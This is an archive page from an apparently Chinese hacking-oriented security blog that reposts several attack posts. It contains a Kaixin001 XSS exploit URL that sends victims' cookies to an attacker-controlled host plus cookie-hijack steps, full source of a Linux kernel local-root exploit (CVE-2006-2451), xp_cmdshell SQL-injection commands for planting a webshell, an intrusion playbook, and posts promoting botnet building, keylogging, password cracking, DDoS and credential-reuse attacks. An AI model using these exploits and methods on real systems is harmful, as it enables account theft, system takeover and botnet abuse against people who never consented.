分类 "网络安全" 的存档.

开心网(kaixin001.com) 好友点歌XSS漏洞

2008.9.25,我公布"国内邮箱系统爆发大规模跨站漏洞"后,FireF0X就和我说,什么时候弄个XSS的主题写写,让大家也一起讨论一下。说来惭愧,也一直没写什么东西,这次在"火狐"公布"Kaixin001.comXSS漏洞",也算是给他有个交代吧。

开心网是一个在线社区,通过它您可以与朋友、同学、同事、

家人保持更紧密的联系,及时了解他们的动态;与他们分享你的照片、心情、快乐。

漏洞描述:

开心网(www.kaixin001.com),当你在给好友点歌时,你可以留言,而开心对用户留言的数据没有进行严格过滤,导致攻击者可以提交恶意代码,进行跨站攻击。攻击者利用该漏洞可以盗取开心网用户的cookie,然后利用Cookie欺骗冒充该用户进行账号登录。危害严重。

代码利用:
http://www.kaixin001.com/music/ordermusic.php?verify=××××_1006_××××_1228989163_×××××&musicid=32331139&musichost=×××××&mid=924962&orderuids=×××××&word=%3Cimg+src%3D%22x%22+onerror%3D%22document.write%28%27%3Ciframe+src%3Dhttp%3A%2F%2Fwww.×××××.com%2Fxss%2Fxsscu.asp%3F%27%2Bescape%28document.cookie%29%2B%27+width%3D0++height%3D0++border%3D0%3E%3C%2Fiframe%3E%27%29%22%3E%0D%0A&group=&quiet=1

verify参数作用是验证用户身份
musicid参数是给好友点播歌曲的ID号
musichost是自己的开心网ID
orderuids是好友开心网ID
word是点歌时留言内容
group 用户组
quiet 悄悄地(将不会出现在好友的动态中)
word参数后可以加入精心构造的跨站代码。

盗取Cookie提交代码:http://www.×××.com/xss/xsscu.asp?'+escape(document.cookie)+' width=0 height=0 border=0>')">
这段明文盗取COOKIE代码,你要转化为URL编码后再提交。
当点歌成功后,恶意代码将以系统消息的形式,发送给受害者。系统会告诉受害者,你的朋友×××给你点了一首歌。

开心网的COOKIE(其实是Session)格式如下:
SERVERID=_srv102-125_;
_user=3b45065b00978846edecd20e6dae7710_×××××_1226381918;
_email=×××××%40126.com; _invisible=0。
你只要把_user中的参数替换掉,就可以利用受害者的帐号进行登录了。

from:http://hi.baidu.com/xisigr/blog/item/95b37455bd928153574e003e.html

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/454

Linux Kernel2.6x 本地溢出代码

复制内容到剪贴板程序代码程序代码
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* – dreyer (main PoC code) */
/* – RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/

#include
#include
#include
#include
#include
#include
#include
#include

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling – Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");

corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);

printf("
Creating Cron entry\n");

if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}

kill(child, SIGSEGV);

printf("
Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);

printf("
Running shell (remember to remove /tmp/sh when finished) …\n");
system("/tmp/sh -p");
}

——————————————————————————————————
保存为:*.c

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/461

SQL注入建立虚拟目录

我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'
建立虚拟目录win,指向c:\windows\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
让win句有解析asp脚本权限

exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
删除虚拟目录。
找不到web绝对路径的一种解决办法,

403错误,表示虚拟目录建好了。。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/462

黑客网络入侵大型网站的完整思路

注:

1.acunetix web vulnerability Scanner 4 简称AC4

2.另外以下一种方式走的通,就不用往下走了

3.个人爱好用Portready,是因为他快速准确,当然你也可以用别的。

4.AC4扫描很耗时间,扫一个网站大约需要3-5个小时,扫整个网段大约需要8个小时左右

方法:

1.X-SCAN扫描目标服务器(一般是没有漏洞,收集信息用吧),看看IIS写权限有漏洞吗,用53溢出或者其他0day和溢出工具试试==>手工查看主站漏洞,先用google+阿d批量扫注入,再手工测试漏洞(例如注入,上传,爆库等等),同时用AC4扫(它在注入方面很细致)==获得WEBSHELL==提权获得3389 (也许有时候把第3条放在第一条前,更合理一些,直接嗅探方便些)。

2.用http://www.seologs.comip-domains.html将主站列同服务器反解析域名,旁注,==>获得WEBSHELL==>提权获得3389

=======渗透过程(选择比较近的网段,同一个网关才好嗅探啊)==========

3.用IIS写权限测试80,8080端口整个网段,用Portready扫描53主机溢出(或者其他漏洞溢出)==>如果有写权限主机,那么提权,获得系统权限,如果可以溢出,获得系统权限==>tracert目标主机,是否同一个网关==>得到3389,用CAIN嗅探目标主机80,21,3389等==>获得目标WEBSHELL==>提权获得目标主机3389

4.用Portready扫描同网段3389,80,8080,8000满足3389+80,8000,8080条件的服务器,反解析域名,手工测试漏洞,同时用AC4扫描网站列表==>获得webshell,提权得到系统权限==>tracert目标主机,是否同一个网关==>得到3389,用CAIN嗅探目标主机80,21,3389等==>获得WEBSHELL==>提权获得3389.

5.用Portready扫描同网段80,8000,8080(主机,(除去上一条扫到的3389主机列表),反解析IP,生成列表,手工测试每个网站,同时用AC4扫描网站列表(如果网站有漏洞,获得WEBSHELL==>提权获得3389==>tracert目标主机,是否同一个网关==>cain嗅探目标主机==>获得目标主机WEBSHELL==>提权获得目标主机3389),同时用x-scan扫描同网段所有主机(如果有漏洞,提权得到3389==>tracert目标主机,是否同一个网关==>cain嗅探目标主机==>获得目标主机WEBSHELL==>提权获得目标主机3389)

6.如果以上均没有漏洞,那就选择网段远一点,或者整个网段,返回第3条。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/463

我是一个渗透手–我不要当肉鸡

0point注:此文相当有思想,极力推荐大家看看,宏观面较强。
By:linzi

交流才不会孤陋寡闻,大家有好的建议可以提出来:D

例子:
我平时找肉鸡都是结合google earth,先定位一下要找的地区,如北京,上海,
HK,TW,KR,JP,USA,东南亚等.

这个时候,再tracert一下就可以把每个地区的骨干网络的拓扑图给画出来,然后
在google地图上玩填空游戏,再接着就开始找肉鸡之行.

这样找出来的肉鸡绝对不会是很次的肉鸡,骨干网络上的肉鸡绝对是一流的,配置是
另一回事,宽带绝对牛B.

当你有了一大堆僵尸网络的时候,可以考虑搭建一个平台.
有点类似于bots管理器.

这个时候你的宏观思想就得用上场了.
第三方程序,操作系统,版本,管理员用户名,数据库用户名等等.

当你收集完这些信息之后就可以开始建立很多平台.

杀毒平台:
假设说,你现在要查你的马是否被杀,你可以很轻松的通过你的平台,找出装了KAV的
有哪些机器,nod32的哪些,小红伞的哪些等等.

这些就是所谓的病毒平台.

调试平台:
这个时候新马出来了,你可以很轻松的找到韩国,中文,日文,英文,2k,2k3,vista
xp等等肉鸡,马上就可以测试出,你的马在哪些环境是ok的,一般这个时候是在虚拟
机调试完后才做这个,否则肉鸡会哗哗的丢,驱动蓝屏太严重了,比芙蓉JJ还恶心..

?蜜罐?平台:
这个时候你可以考虑选择性的给不同类型的机器中上键盘记录,很多时候会收获到
很多的病毒样本,好用的tools,而且可以分析出,其它的黑客的渗透手法,很多时
候,别人的手法比较高明多了,很值得学习.把自己的快乐建立在他人的郁闷上…

分析平台:
不同的地方,不同的操作系统,不同的管理员,不同类型的管理员的操作习惯等,这
些你都可以通过技术手段得到分析报告.当你有了这些报告,渗透不同类型的站,你
就可以很轻松的知道管理员会查哪些,怎么查,以及是否要改变平台的渗透习惯等.
第三方软件的统计也是很有帮助的,你可以知道不同地区的管理员习惯,如韩国人
喜欢用鸡蛋ftp,喜欢用ahnlab,不用winrar,他的密码习惯一般来韩文打成英文等.
这些都是很有用的,如美国佬的pc机都喜欢用quicktime,服务器喜欢装symantec和
卖咖啡的,韩国佬的密码长度一般是12位,中国人搞股票的人的密码习惯,搞IT的
人的密码长度,规则等等…

暴破平台:
看看xmd5的模式就知道了,以肉鸡的形式来保存散列,这个时候,例如说,当你有
很多肉鸡,你可以用来暴破winrar,winzip,office,md5,sha等等,这个要看水平了
网上半成品工具,诸如:xdoor

代理平台:
sslvpn,sslproxy,vpn,等等,发挥你们的想像力吧….
如果你的coding能力够的话,其实可以写出一个很cool的管理软件.
你点一下北京,再点一下上海,再点一下韩国,再点一下米国,这个时候,程序就
会自动化的计算出你手里的肉鸡应该先连接哪台,再连接哪台,然后再以google
earth的形式,像电影式的给列出来,so cool~~~~

DDOS平台:
靠,一看就是大坏蛋…..

其它平台….
发挥你们的想像力吧…..

每次,当我打开google earth的时候,朋友说,我眼睛都绿了,因为我总觉得哗
啦啦的全是肉鸡,全是极品肉鸡,全是vpn…..

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/466

现在一些人常见的迂回式渗透方法 分享

By:linzi

也就是这两年,圈子里面的人才意识到这个渗透手法很有意思.

可以看一下以前我写过的一篇文章:
http://www.hackeye.com/article/2943/

其实原理很简单,现在模拟一下以前dz被黑的时候的经过.
先通过论坛,收集出管理员的用户名,管理员的邮箱,QQ,MSN等一些常见的信息等.

通过google定位到管理员曾经注册过的站,再把曾经注册过的站给日了,套出管理员注册时的密码.

然后再用这些密码来试dz的后台.最后拿下权限.总体思路无外乎这样….

这其间最多最多再加些小技巧在里面.

当你还留停在这种渗透手法的时候,个人建议,跳出这个思维,当你跳出这个思维的时候,你可能会发现
另外的渗透手法,掌握的话,国内90%以上的站,拿下都跑玩儿似的….

在去年的时候,国外也开始关注之种技术,他们给了个称号叫社交型网络攻击.
而这个技术,在中国的底下,称的上运用成熟的,估计已经有四五年了,据我所知的.

我这里简单介绍一下这种攻击模式:
首先,需要定位好哪些大型网络可以利用.国外的话,例如说myspace,facebook等.
就国内来说,我们不能以所谓的大型网络来区分,需要的是系统的划分.

ssn网络,如:xiaonei,kaixin001,douban等,门户网站:163,sina,sohu,qq等…门类型:技术类如:csdn,域名型:新网,万网等

当你要渗透一个目标的时候,有的时候能够从google里面获取的信息很少,但通过社交型的攻击,你可以获取到很
多很有用的信息,QQ,QQ书签,163的photo,sohu的blog……

国外现在已经有一个商业性的软件,当你输入一个人的email或姓名类,这个时候,他会自动化的调用这些大型网络,把这个人的
所有可能的信息全给你用图形化模式给列出来,还包括你可能联系的人等等,特别黄,特别暴力….

如果你想深入了解这种技术的话,个人建议把这种技术画出来,系统化的整理出来,可能的话,就上升为理论.
因为当你整理出来完之后,你可以很容易的挖出另外的全新的模击模式.新的模击模式出来后,再过一段时间又可以
发现再新的再恐怖的攻击模式,再再另一个种模式,可以日下90%以上的pc机,你信吗,^_^…..

再过一两年,当所谓的应用层的攻击技术无法满足渗透需求的时候,那个时候再研究新技术,心态可能都不一样了
以其那时,不如现在…..

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/467

Firefox恶意插件

by:刺

命名为:Trojan.PWS.ChromeInject.A

目标是窃取网银密码。

两个文件:
"%ProgramFiles%\Mozilla Firefox\plugins\npbasic.dll"
"%ProgramFiles%\Mozilla Firefox\chrome\chrome\content\browser.js"

监控所有firefox浏览的网站,发现是网银的,就准备开始记录密码,并发送到远程服务器。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/468